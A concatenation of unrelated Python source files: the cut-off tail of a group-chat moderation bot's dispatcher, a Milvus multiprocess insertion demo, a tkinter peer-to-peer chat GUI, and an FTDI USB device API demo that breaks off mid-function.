= Thread(target=shot_image, args=(text, chat, bot,)) tawd16.start() elif text.startswith('!speak'): print('mpa started') tawd6 = Thread(target=speak_after, args=(text, chat, bot,)) tawd6.start() elif text.startswith('!p_danesh'): tawd12 = Thread(target=p_danesh, args=(text, chat, bot,)) tawd12.start() elif text.startswith('!write ['): print('mpa started') tawd5 = Thread(target=write_image, args=(text, chat, bot,)) tawd5.start() elif chat['abs_object']['type'] == 'Group' and 'DeleteGlobalAllMessages' in access and hasInsult(text)[0] == True: tawd13 = Thread(target=anti_insult, args=(text, chat, bot,)) tawd13.start() elif chat['abs_object']['type'] == 'Group' and 'DeleteGlobalAllMessages' in access and hasAds(text) == True: tawd14 = Thread(target=anti_tabligh, args=(text, chat, bot,)) tawd14.start() elif text.startswith('!help'): tawd38 = Thread(target=get_help, args=(text, chat, bot,)) tawd38.start() elif text.startswith('!usvl_start') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl == '': g_usvl = chat['object_guid'] bot.sendMessage(chat['object_guid'], 'usvl is started', chat['last_message']['message_id']) elif text.startswith('!usvl_stop') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl != '': g_usvl = '' bot.sendMessage(chat['object_guid'], 'usvl is stopped', chat['last_message']['message_id']) elif text.startswith('!usvl_test') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl == '' and test_usvl == False: test_usvl = True bot.sendMessage(chat['object_guid'], 'test usvl is started', chat['last_message']['message_id']) elif text.startswith('!usvl_untest') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and test_usvl == True: test_usvl = False bot.sendMessage(chat['object_guid'], 'test usvl is stopped', chat['last_message']['message_id']) elif text.startswith('!backup') and chat['object_guid'] in qrozAdmins: tawd44 = Thread(target=get_backup, args=(text, chat, bot,)) tawd44.start() elif chat['object_guid'] == g_usvl and chat['last_message']['author_object_guid'] != 'u0DHSrv0bd39028f37e44305e207e38a' and chat['abs_object']['type'] == 'Group': tawd42 = Thread(target=usvl_save_data, args=(text, chat, bot,)) tawd42.start() elif test_usvl == True and chat['last_message']['author_object_guid'] != 'u0DHSrv0bd39028f37e44305e207e38a' and chat['abs_object']['type'] == 'Group': print('usvl tested') tawd43 = Thread(target=usvl_test_data, args=(text, chat, bot,)) tawd43.start() list_message_seened.append(m_id) elif 'SendMessages' in access and chat['last_message']['type'] == 'Other' and text.strip() != '' and chat['abs_object']['type'] == 'Group' and chat['abs_object']['type'] == 'Group': text = text.strip() m_id = chat['object_guid'] + chat['last_message']['message_id'] if not m_id in list_message_seened: if text == 'یک عضو گروه را ترک کرد.': tawd35 = Thread(target=get_leaved, args=(text, chat, bot,)) tawd35.start() elif text == '1 عضو جدید به گروه افزوده شد.' or text == 'یک عضو از طریق لینک به گروه افزوده شد.': tawd36 = Thread(target=get_added, args=(text, chat, bot,)) tawd36.start() list_message_seened.append(m_id) elif 'SendMessages' in access and text.strip() != '' and chat['abs_object']['type'] == 'Group': text = text.strip() m_id = chat['object_guid'] + chat['last_message']['message_id'] if not m_id in list_message_seened: if 'DeleteGlobalAllMessages' in access and hasInsult(text)[0] == True: tawd39 = Thread(target=anti_insult, args=(text, chat, bot,)) tawd39.start() list_message_seened.append(m_id) elif 'DeleteGlobalAllMessages' in access and hasAds(text) == True: tawd40 = Thread(target=anti_tabligh, args=(text, chat, bot,)) tawd40.start() list_message_seened.append(m_id) else: print('no update ') except: print('qroz err koli') time_reset2 = random._floor(datetime.datetime.today().timestamp()) if list_message_seened != [] and time_reset2 > time_reset: list_message_seened = [] time_reset = random._floor(datetime.datetime.today().timestamp()) + 350
multiprocess_example.py
## This program demos how to use milvus python client with multi-process import os from multiprocessing import Process from factorys import * from milvus import Milvus ############### Global variable ########### collection_name = 'test_test' param = {'collection_name': collection_name, 'dimension': 128, 'index_file_size': 1024, 'metric_type': MetricType.L2} server_config = { 'host': "127.0.0.1", 'port': "19530" } ## Utils def _generate_vectors(_dim, _num): return [[random.random() for _ in range(_dim)] for _ in range(_num)] def prepare_collection(_collection_name): def _create_collection(_collection_param): milvus = Milvus() milvus.connect(**server_config) status, ok = milvus.has_collection(_collection_name) if ok: print("Table {} found, now going to delete it".format(_collection_name)) status = milvus.drop_collection(_collection_name) if not status.OK(): raise Exception("Delete collection error") print("delete collection {} successfully!".format(_collection_name)) time.sleep(5) status, ok = milvus.has_collection(_collection_name) if ok: raise Exception("Delete collection error") status = milvus.create_collection(param) if not status.OK(): print("Create collection {} failed".format(_collection_name)) milvus.disconnect() # generate a process to run func `_create_collection`. A exception will be raised if # func `_create_collection` run in main process p = Process(target=_create_collection, args=(param,)) p.start() p.join() def multi_insert(_collection_name): # contain whole subprocess process_list = [] def _add(): milvus = Milvus() status = milvus.connect(**server_config) vectors = _generate_vectors(128, 10000) print('\n\tPID: {}, insert {} vectors'.format(os.getpid(), 10000)) status, _ = milvus.add_vectors(_collection_name, vectors) milvus.disconnect() for i in range(10): p = Process(target=_add) process_list.append(p) p.start() # block main process until whole sub process exit for p in process_list: p.join() print("insert vector successfully!") def validate_insert(_collection_name): milvus = Milvus() milvus.connect(**server_config) status, count = milvus.count_collection(_collection_name) assert count == 10 * 10000, "Insert validate fail. Vectors num is not matched." milvus.disconnect() def main(_collection_name): prepare_collection(_collection_name) # use multiple process to insert data multi_insert(_collection_name) # sleep 3 seconds to wait for vectors inserted Preservation time.sleep(3) validate_insert(_collection_name) if __name__ == '__main__': main(collection_name)
demo_gui.py
import threading import time # import module GUI from tkinter import * from tkinter.font import * # internal module from p2pchat import * __version__ = "0.1-beta" def rgb2hex(r , g, b): return f'#{r:02x}{g:02x}{b:02x}' def window_create_connection(event = None): # some special function def submitConnection(event = None): client = addrclient_input_entry.get() addrclient_input_entry.unbind("<Return>") state.set("Connecting...") addrclient_input_state.update() if _send.create_connection(client) == True: addrclient_input_state.config(fg="Spring Green") state.set("Connect to {} successfully!".format(client)) else: addrclient_input_state.config(fg="Red") state.set("Connect to {} failed!".format(client)) addrclient_input_state.update() time.sleep(1) win_conn.destroy() win_conn.update() # config var w_win_conn = 270 h_win_conn = 50 # Create Window container win_conn = Toplevel() win_conn.title("Create connection") win_conn.config(bg=theme_color, width=w_win_conn, height=h_win_conn) win_conn.minsize(w_win_conn,h_win_conn) win_conn.resizable(False, False) # Create Connection input conn_frame = LabelFrame(win_conn, text = "Connection") conn_frame.config(bg=theme_color, fg=font_color, font=font, width=w_win_conn) conn_frame.pack(fill="both", expand=True) addrclient_input_label = Label(conn_frame, text = "Create Connections") addrclient_input_label.config(bg=theme_color, fg=font_color, font=font) addrclient_input_label.pack(side="left") addrclient_input_entry = Entry(conn_frame) addrclient_input_entry.config(bg=theme_color, fg=font_color, insertbackground=font_color, font=font, width=17) addrclient_input_entry.focus_set() addrclient_input_entry.bind("<Return>", submitConnection) addrclient_input_entry.pack(side="right", padx=5, pady=5) # Create State of connection state_frame = LabelFrame(win_conn, text = "Status") state_frame.config(bg=theme_color, fg=font_color, font=font, width=w_win_conn) state_frame.pack(fill="both", expand=True) state = StringVar() state.set("Insert IP Address") addrclient_input_state = Label(state_frame, textvariable=state) addrclient_input_state.config(bg=theme_color, fg=font_color, justify=CENTER, font=font) addrclient_input_state.pack() return def printRecvMessage(): _recv.listen() while True: # get message from receive stream _message = _recv.recv_msg() # print message to the content box if _message != None: mess_content_box.config(state=NORMAL) mess_content_box.insert(INSERT, _message + "\n") mess_content_box.config(state=DISABLED) mess_content_box.see(END) # check and connect to remote connection if _recv.client_addr != None and _send.client_addr == None: _send.create_connection(_recv.client_addr[0]) def printSendMessage(event = None): # some special function def formatString(msg): _msg = [] wordlist = (' ', '\t') def toString(arr): str1 = "" return str1.join(arr) for i in range(1,len(msg)): if i == len(msg) - 1 and msg[i] in wordlist: break if msg[i] == msg[i-1] and msg[i] in wordlist: continue _msg.append(msg[i-1]) msg = toString(_msg) wordlist = (' ', '\t','\n') for i in range(1,len(msg)): if msg[-i] in wordlist: continue else: if i == 1: return msg msg = msg[0:-i] break return msg # get message from the input box _message = formatString(str(mess_input_box.get("1.0", END))) mess_input_box.delete("1.0", END) # print message to the content box if not _message == "": _send.send_msg(_message) mess_content_box.config(state=NORMAL) mess_content_box.insert(INSERT, "{}: {}".format(_send.host_user,_message + "\n")) mess_content_box.config(state=DISABLED) mess_content_box.see(END) return "break" # Prevent tkinter insert newline def createShortcutKey(): mainWindow.bind("<Control-n>", window_create_connection) mainWindow.bind("<Control-q>", lambda e:mainWindow.quit()) def createMenu(): # some special function def show_About(): w_win_about = 215 h_win_about = 40 win_about = Toplevel(mainWindow) win_about.title("About") win_about.config(bg=theme_color) win_about.minsize(w_win_about, h_win_about) win_about.resizable(False, False) author_frame = LabelFrame(win_about, text="Author") author_frame.config(bg=theme_color, fg=font_color, font=font, width=w_win_about) author_frame.pack(fill="both", expand=True) author = Label(author_frame, text="n3r0") author.config(bg=theme_color, fg=font_color, font=font) author.pack() ver_frame = LabelFrame(win_about, text="Version") ver_frame.config(bg=theme_color, fg=font_color, font=font, width=w_win_about) ver_frame.pack(fill="both", expand=True) ver = Label(ver_frame, text=__version__) ver.config(bg=theme_color, fg=font_color, font=font) ver.pack() # create the menu container menubar = Menu(mainWindow) # create Preference menu prefmenu = Menu(menubar, tearoff = 0) # add option to Preference menu prefmenu.add_command(label="New Connect Ctrl+N", command=window_create_connection) prefmenu.add_separator() prefmenu.add_command(label="Quit Ctrl+Q", command=mainWindow.quit) # create Help menu helpmenu = Menu(menubar, tearoff = 0) # add option to Help menu helpmenu.add_command(label="About", command=show_About) # add child menus to menu bar menubar.add_cascade(label="Preference", menu = prefmenu) menubar.add_cascade(label="Help", menu = helpmenu) mainWindow.config(menu = menubar) def createMainLayout(): # some special function def insertNewline(event = None): return # create the container mainLayout = Frame(mainWindow) mainLayout.pack(fill="both", expand=True) # create content box h_mess_content_box = 20 #lines not pixels global mess_content_box mess_content_box = Text(mainLayout, width=w_mainWindow, height=h_mess_content_box) # mess_content_box = Text(mainWindow, width=w_mainWindow, height=h_mess_content_box) mess_content_box.config(state=DISABLED, bg=theme_color, fg=font_color, font=font) mess_content_box.pack(side=TOP) # create input box h_mess_input_box = 2 #lines not pixels global mess_input_box mess_input_box = Text(mainLayout, width=w_mainWindow, height=h_mess_input_box) # mess_input_box = Text(mainWindow, width=w_mainWindow, height=h_mess_input_box) mess_input_box.config(bg=theme_color, fg=font_color, insertbackground=font_color, font=font) mess_input_box.focus_set() mess_input_box.bind("<Return>", printSendMessage) mess_input_box.bind("<Shift-Return>", insertNewline) mess_input_box.pack(side=BOTTOM) try: _send = send_session() _recv = recv_session() mainWindow = Tk() # global var w_mainWindow = "660" h_mainWindow = "360" theme_color = "#0e1621" font_color = "white" font = Font(family="sans-serif", size=10) # Init for main window mainWindow.resizable(False, False) mainWindow.title("P2PChatBox") mainWindow.geometry("{}x{}".format(w_mainWindow,h_mainWindow)) # Init function for render main Window createShortcutKey() createMenu() createMainLayout() # Special event th = threading.Thread(target=printRecvMessage, daemon=True) th.start() mainWindow.mainloop() except Exception as e: print(e)
apiusage.py
import ftd3xx import sys if sys.platform == 'win32': import ftd3xx._ftd3xx_win32 as _ft elif sys.platform == 'linux': import ftd3xx._ftd3xx_linux as _ft import datetime import time import binascii import itertools import ctypes import threading import logging import os import platform import random import string import struct def DemoGetNumDevicesConnected(): DEVICES = ftd3xx.listDevices() return len(DEVICES) if DEVICES is not None else 0 def DemoWaitForDeviceReenumeration(): # should be called when setChipConfiguration, cycleDevicePort or resetDevicePort is called # todo: get optimal sleep times origValue = ftd3xx.raiseExceptionOnError(False) time.sleep(1) while (ftd3xx.listDevices() == None): time.sleep(1) time.sleep(1) ftd3xx.raiseExceptionOnError(origValue) if sys.platform == 'linux': count = 0 while count == 0: count = ftd3xx.createDeviceInfoList() def DemoTurnOffPipeThreads(): # Call before FT_Create when non-transfer functions will be called # Only needed for RevA chip (Firmware 1.0.2) # Not necessary starting RevB chip (Firmware 1.0.9) if sys.platform == 'linux': conf = _ft.FT_TRANSFER_CONF(); conf.wStructSize = ctypes.sizeof(_ft.FT_TRANSFER_CONF); conf.pipe[_ft.FT_PIPE_DIR_IN].fPipeNotUsed = True; conf.pipe[_ft.FT_PIPE_DIR_OUT].fPipeNotUsed = True; conf.pipe.fReserved = False; conf.pipe.fKeepDeviceSideBufferAfterReopen = False; for i in range(4): ftd3xx.setTransferParams(conf, i); return True def DemoEnumerateDevices(): numDevices = ftd3xx.createDeviceInfoList() if (numDevices == 0): return False # list devices by listDevices(description) logging.debug("List devices by listDevices(description)") DEVICES = ftd3xx.listDevices(_ft.FT_OPEN_BY_DESCRIPTION) if (DEVICES is None): return False logging.debug("Device count = %d" % len(DEVICES)) for i in range(len(DEVICES)): logging.debug("DEVICE[%d] = %s" % (i, DEVICES[i].decode('utf-8'))) DEVICES = 0 logging.debug("") # list devices by listDevices(serial number) logging.debug("List devices by listDevices(serial number)") DEVICES = ftd3xx.listDevices(_ft.FT_OPEN_BY_SERIAL_NUMBER) if (DEVICES is None): return False logging.debug("Device count = %d" % len(DEVICES)) for i in range(len(DEVICES)): logging.debug("DEVICE[%d] = %s" % (i, DEVICES[i].decode('utf-8'))) DEVICES = 0 logging.debug("") # list devices by getDeviceInfoList() logging.debug("List devices by getDeviceInfoList()") logging.debug("Device count = %d" % numDevices) DEVICELIST = ftd3xx.getDeviceInfoList() for i in range(numDevices): logging.debug("DEVICE[%d]" % i) logging.debug("\tFlags = %d" % DEVICELIST[i].Flags) logging.debug("\tType = %d" % DEVICELIST[i].Type) logging.debug("\tID = %#010X" % DEVICELIST[i].ID) logging.debug("\tLocId = %d" % DEVICELIST[i].LocId) logging.debug("\tSerialNumber = %s" % DEVICELIST[i].SerialNumber.decode('utf-8')) logging.debug("\tDescription = %s" % DEVICELIST[i].Description.decode('utf-8')) DEVICELIST = 0 logging.debug("") # list devices by getDeviceInfoDetail() logging.debug("List devices by getDeviceInfoDetail()") logging.debug("Device count = %d" % numDevices) for i in range(numDevices): DEVICE = ftd3xx.getDeviceInfoDetail(i) logging.debug("DEVICE[%d]" % i) logging.debug("\tFlags = %d" % DEVICE['Flags']) logging.debug("\tType = %d" % DEVICE['Type']) logging.debug("\tID = %#010X" % DEVICE['ID']) logging.debug("\tLocId = %d" % DEVICE['LocId']) logging.debug("\tSerialNumber = %s" % DEVICE['SerialNumber'].decode('utf-8')) logging.debug("\tDescription = %s" % DEVICE['Description'].decode('utf-8')) DEVICE = 0 logging.debug("") return True def DemoOpenDeviceBy(): if sys.platform == 'linux': DemoTurnOffPipeThreads() # get description and serial number of device at index 0 ftd3xx.createDeviceInfoList() DEVICELIST = ftd3xx.getDeviceInfoList() # open device by index openby = 0 logging.debug("Open by index [%d]" % openby) D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if (D3XX is None): logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.close() D3XX = 0 # open device by description if sys.platform == 'linux': DemoTurnOffPipeThreads() ftd3xx.createDeviceInfoList() DEVICELIST = ftd3xx.getDeviceInfoList() openby = DEVICELIST[0].Description logging.debug("Open by description [%s]" % openby.decode('utf-8')) D3XX = ftd3xx.create(openby, _ft.FT_OPEN_BY_DESCRIPTION) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.close() D3XX = 0 # open device by serial number if sys.platform == 'linux': DemoTurnOffPipeThreads() ftd3xx.createDeviceInfoList() DEVICELIST = ftd3xx.getDeviceInfoList() openby = DEVICELIST[0].SerialNumber logging.debug("Open by serial number [%s]" % openby.decode('utf-8')) D3XX = ftd3xx.create(openby, _ft.FT_OPEN_BY_SERIAL_NUMBER) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.close() D3XX = 0 return True def DemoVersions(): if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # getLibraryVersion ulLibraryVersion = D3XX.getLibraryVersion() logging.debug("LibraryVersion = %#08X" % ulLibraryVersion) # getDriverVersion ulDriverVersion = D3XX.getDriverVersion() logging.debug("DriverVersion = %#08X" % ulDriverVersion) # getFirmwareVersion ulFirmwareVersion = D3XX.getFirmwareVersion() logging.debug("FirmwareVersion = %#08X" % ulFirmwareVersion) D3XX.close() D3XX = 0 # check driver version if (sys.platform == 'win32'): if (ulDriverVersion < 0x01020006): logging.debug("ERROR: Old kernel driver version. Please update driver from Windows Update or FTDI website!") return False return True def DemoDescriptors(): if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # getVIDPID VID, PID = D3XX.getVIDPID() logging.debug("VID = %#04X" % VID) logging.debug("PID = %#04X" % PID) logging.debug("") if sys.platform == 'win32': # getDeviceInfo DEVINFO = D3XX.getDeviceInfo() logging.debug("Type = %d" % DEVINFO['Type']) logging.debug("ID = %#08X" % DEVINFO['ID']) logging.debug("Serial = %s" % DEVINFO['Serial'].decode('utf-8')) logging.debug("Description = %s" % DEVINFO['Description'].decode('utf-8')) logging.debug("") # getDeviceDescriptor DEVDESC = D3XX.getDeviceDescriptor() STRDESCMANU = D3XX.getStringDescriptor(DEVDESC.iManufacturer) STRDESCPROD = D3XX.getStringDescriptor(DEVDESC.iProduct) STRDESCSERN = D3XX.getStringDescriptor(DEVDESC.iSerialNumber) logging.debug("Device Descriptor") logging.debug("\tbLength = %d" % DEVDESC.bLength) logging.debug("\tbDescriptorType = %d" % DEVDESC.bDescriptorType) logging.debug("\tbcdUSB = %#04X (%s)" % (DEVDESC.bcdUSB, "USB2" if (DEVDESC.bcdUSB < 0x300) else "USB3")) logging.debug("\tbDeviceClass = %#02X" % DEVDESC.bDeviceClass) logging.debug("\tbDeviceSubClass = %#02X" % DEVDESC.bDeviceSubClass) logging.debug("\tbDeviceProtocol = %#02X" % DEVDESC.bDeviceProtocol) logging.debug("\tbMaxPacketSize0 = %#02X (%d)" % (DEVDESC.bMaxPacketSize0, DEVDESC.bMaxPacketSize0)) logging.debug("\tidVendor = %#04X" % DEVDESC.idVendor) logging.debug("\tidProduct = %#04X" % DEVDESC.idProduct) logging.debug("\tbcdDevice = %#04X" % DEVDESC.bcdDevice) if sys.platform == 'win32': logging.debug("\tiManufacturer = %#02X (%s)" % (DEVDESC.iManufacturer, str(STRDESCMANU.szString))) logging.debug("\tiProduct = %#02X (%s)" % (DEVDESC.iProduct, str(STRDESCPROD.szString))) logging.debug("\tiSerialNumber = %#02X (%s)" % (DEVDESC.iSerialNumber, str(STRDESCSERN.szString))) else: logging.debug("\tiManufacturer = %#02X" % (DEVDESC.iManufacturer)) logging.debug("\tiProduct = %#02X" % (DEVDESC.iProduct)) logging.debug("\tiSerialNumber = %#02X" % (DEVDESC.iSerialNumber)) logging.debug("\tbNumConfigurations = %#02X" % DEVDESC.bNumConfigurations) logging.debug("") # getConfigurationDescriptor CFGDESC = D3XX.getConfigurationDescriptor() logging.debug("Configuration Descriptor") logging.debug("\tbLength = %d" % CFGDESC.bLength) logging.debug("\tbDescriptorType = %d" % CFGDESC.bDescriptorType) logging.debug("\twTotalLength = %#04X (%d)" % (CFGDESC.wTotalLength, CFGDESC.wTotalLength)) logging.debug("\tbNumInterfaces = %#02X" % CFGDESC.bNumInterfaces) logging.debug("\tbConfigurationValue = %#02X" % CFGDESC.bConfigurationValue) logging.debug("\tiConfiguration = %#02X" % CFGDESC.iConfiguration) bSelfPowered = "Self-powered" if (CFGDESC.bmAttributes & _ft.FT_SELF_POWERED_MASK) else "Bus-powered" bRemoteWakeup = "Remote wakeup" if (CFGDESC.bmAttributes & _ft.FT_REMOTE_WAKEUP_MASK) else "" logging.debug("\tbmAttributes = %#02X (%s %s)" % (CFGDESC.bmAttributes, bSelfPowered, bRemoteWakeup)) logging.debug("\tMaxPower = %#02X (%d mA)" % (CFGDESC.MaxPower, CFGDESC.MaxPower)) logging.debug("") # getInterfaceDescriptor # getPipeInformation for i in range(CFGDESC.bNumInterfaces): IFDESC = D3XX.getInterfaceDescriptor(i) logging.debug("\tInterface Descriptor [%d]" % i) logging.debug("\t\tbLength = %d" % IFDESC.bLength) logging.debug("\t\tbDescriptorType = %d" % IFDESC.bDescriptorType) logging.debug("\t\tbInterfaceNumber = %#02X" % IFDESC.bInterfaceNumber) logging.debug("\t\tbAlternateSetting = %#02X" % IFDESC.bAlternateSetting) logging.debug("\t\tbNumEndpoints = %#02X" % IFDESC.bNumEndpoints) logging.debug("\t\tbInterfaceClass = %#02X" % IFDESC.bInterfaceClass) logging.debug("\t\tbInterfaceSubClass = %#02X" % IFDESC.bInterfaceSubClass) logging.debug("\t\tbInterfaceProtocol = %#02X" % IFDESC.bInterfaceProtocol) logging.debug("\t\tiInterface = %#02X" % IFDESC.iInterface) logging.debug("") for j in range(IFDESC.bNumEndpoints): PIPEIF = D3XX.getPipeInformation(i, j) logging.debug("\t\tPipe Information [%d]" % j) logging.debug("\t\t\tPipeType = %d" % PIPEIF.PipeType) logging.debug("\t\t\tPipeId = %#02X" % PIPEIF.PipeId) logging.debug("\t\t\tMaximumPacketSize = %#02X" % PIPEIF.MaximumPacketSize) logging.debug("\t\t\tInterval = %#02X" % PIPEIF.Interval) logging.debug("") D3XX.close() D3XX = 0 return True def GetInfoFromStringDescriptor(stringDescriptor): desc = bytearray(stringDescriptor) len = int(desc[0]) Manufacturer = "" for i in range(2, len, 2): Manufacturer += "{0:c}".format(desc[i]) desc = desc[len:] len = desc[0] ProductDescription = "" for i in range(2, len, 2): ProductDescription += "{0:c}".format(desc[i]) desc = desc[len:] len = desc[0] SerialNumber = "" for i in range(2, len, 2): SerialNumber += "{0:c}".format(desc[i]) desc = desc[len:] return {'Manufacturer': Manufacturer, 'ProductDescription': ProductDescription, 'SerialNumber': SerialNumber} def SetInfoForStringDescriptor(cfg, manufacturer, productDescription, serialNumber): # verify length of strings if (len(manufacturer) >= _ft.FT_MAX_MANUFACTURER_SIZE): return False if (len(productDescription) >= _ft.FT_MAX_DESCRIPTION_SIZE): return False if (len(serialNumber) >= _ft.FT_MAX_SERIAL_NUMBER_SIZE): return False # convert strings to bytearrays manufacturer = bytearray(manufacturer, 'utf-8') productDescription = bytearray(productDescription, 'utf-8') serialNumber = bytearray(serialNumber, 'utf-8') ctypes.memset(cfg.StringDescriptors, 0, 128) desc = cfg.StringDescriptors # copy manufacturer offset = 0 desc[offset] = len(manufacturer)*2 + 2 desc[offset + 1] = 0x3 offset += 2 for i in range (0, len(manufacturer)): desc[int(offset + (i*2))] = manufacturer[i] desc[int(offset + (i*2)+1)] = 0x0 # copy product description offset += len(manufacturer)*2 desc[offset] = len(productDescription)*2 + 2 desc[offset + 1] = 0x3 offset += 2 for i in range (0, len(productDescription)): desc[int(offset + (i*2))] = productDescription[i] desc[int(offset + (i*2)+1)] = 0x0 # copy serial number offset += len(productDescription)*2 desc[offset] = len(serialNumber)*2 + 2 desc[offset + 1] = 0x3 offset += 2 for i in range (0, len(serialNumber)): desc[int(offset + (i*2))] = serialNumber[i] desc[int(offset + (i*2)+1)] = 0x0 #for e in desc: print "%x" % e return True def DisplayChipConfiguration(cfg): logging.debug("Chip Configuration:") logging.debug("\tVendorID = %#06x" % cfg.VendorID) logging.debug("\tProductID = %#06x" % cfg.ProductID) logging.debug("\tStringDescriptors") STRDESC = GetInfoFromStringDescriptor(cfg.StringDescriptors) logging.debug("\t\tManufacturer = %s" % STRDESC['Manufacturer']) logging.debug("\t\tProductDescription = %s" % STRDESC['ProductDescription']) logging.debug("\t\tSerialNumber = %s" % STRDESC['SerialNumber']) logging.debug("\tInterruptInterval = %#04x" % cfg.bInterval) bSelfPowered = "Self-powered" if (cfg.PowerAttributes & _ft.FT_SELF_POWERED_MASK) else "Bus-powered" bRemoteWakeup = "Remote wakeup" if (cfg.PowerAttributes & _ft.FT_REMOTE_WAKEUP_MASK) else "" logging.debug("\tPowerAttributes = %#04x (%s %s)" % (cfg.PowerAttributes, bSelfPowered, bRemoteWakeup)) logging.debug("\tPowerConsumption = %#04x" % cfg.PowerConsumption) logging.debug("\tReserved2 = %#04x" % cfg.Reserved2) fifoClock = ["100 MHz", "66 MHz", "50 MHz", "40 MHz"] logging.debug("\tFIFOClock = %#04x (%s)" % (cfg.FIFOClock, fifoClock[cfg.FIFOClock])) fifoMode = ["245 Mode", "600 Mode"] logging.debug("\tFIFOMode = %#04x (%s)" % (cfg.FIFOMode, fifoMode[cfg.FIFOMode])) channelConfig = ["4 Channels", "2 Channels", "1 Channel", "1 OUT Pipe", "1 IN Pipe"] logging.debug("\tChannelConfig = %#04x (%s)" % (cfg.ChannelConfig, channelConfig[cfg.ChannelConfig])) logging.debug("\tOptionalFeatureSupport = %#06x" % cfg.OptionalFeatureSupport) logging.debug("\t\tBatteryChargingEnabled : %d" % ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLEBATTERYCHARGING) >> 0) ) logging.debug("\t\tDisableCancelOnUnderrun : %d" % ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLECANCELSESSIONUNDERRUN) >> 1) ) logging.debug("\t\tNotificationEnabled : %d %d %d %d" % (((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH1) >> 2), ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH2) >> 3), ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH3) >> 4), ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH4) >> 5) )) logging.debug("\t\tUnderrunEnabled : %d %d %d %d" % (((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLEUNDERRUN_INCH1) >> 6), ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLEUNDERRUN_INCH2) >> 7), ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLEUNDERRUN_INCH3) >> 8), ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLEUNDERRUN_INCH4) >> 9) )) logging.debug("\t\tEnableFifoInSuspend : %d" % ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_SUPPORT_ENABLE_FIFO_IN_SUSPEND) >> 10) ) logging.debug("\t\tDisableChipPowerdown : %d" % ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_SUPPORT_DISABLE_CHIP_POWERDOWN) >> 11) ) logging.debug("\tBatteryChargingGPIOConfig = %#02x" % cfg.BatteryChargingGPIOConfig) logging.debug("\tFlashEEPROMDetection = %#02x (read-only)" % cfg.FlashEEPROMDetection) logging.debug("\t\tCustom Config Validity : %s" % ("Invalid" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_CUSTOMDATA_INVALID)) else "Valid") ) logging.debug("\t\tCustom Config Checksum : %s" % ("Invalid" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_CUSTOMDATACHKSUM_INVALID)) else "Valid") ) logging.debug("\t\tGPIO Input : %s" % ("Used" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_GPIO_INPUT)) else "Ignore") ) if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_GPIO_INPUT)): logging.debug("\t\tGPIO 0 : %s" % ("High" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_GPIO_0)) else "Low") ) logging.debug("\t\tGPIO 1 : %s" % ("High" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_GPIO_1)) else "Low") ) logging.debug("\t\tConfig Used : %s" % ("Custom" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_CUSTOM)) else "Default") ) logging.debug("\tMSIO_Control = %#010x" % cfg.MSIO_Control) logging.debug("\tGPIO_Control = %#010x" % cfg.GPIO_Control) logging.debug("") def DemoGetChipConfiguration(bDisplay=True): if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # get and display current chip configuration logging.debug("get current chip configuration") cfg = D3XX.getChipConfiguration() DisplayChipConfiguration(cfg) D3XX.close() D3XX = 0 return True def DemoResetChipConfiguration(bDisplay=True): if bDisplay == True: logging.debug("reset chip configuration") if sys.platform == 'linux': DemoTurnOffPipeThreads() # set default chip configuration D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # Hack: Reset it to some decent config.. cfg = D3XX.getChipConfiguration() cfg.ProductID = 0x601e cfg.bInterval = 0x09 cfg.PowerAttributes = 0xe0 cfg.PowerConsumption = 0x60 cfg.Reserved2 = 0x00 cfg.FIFOClock = 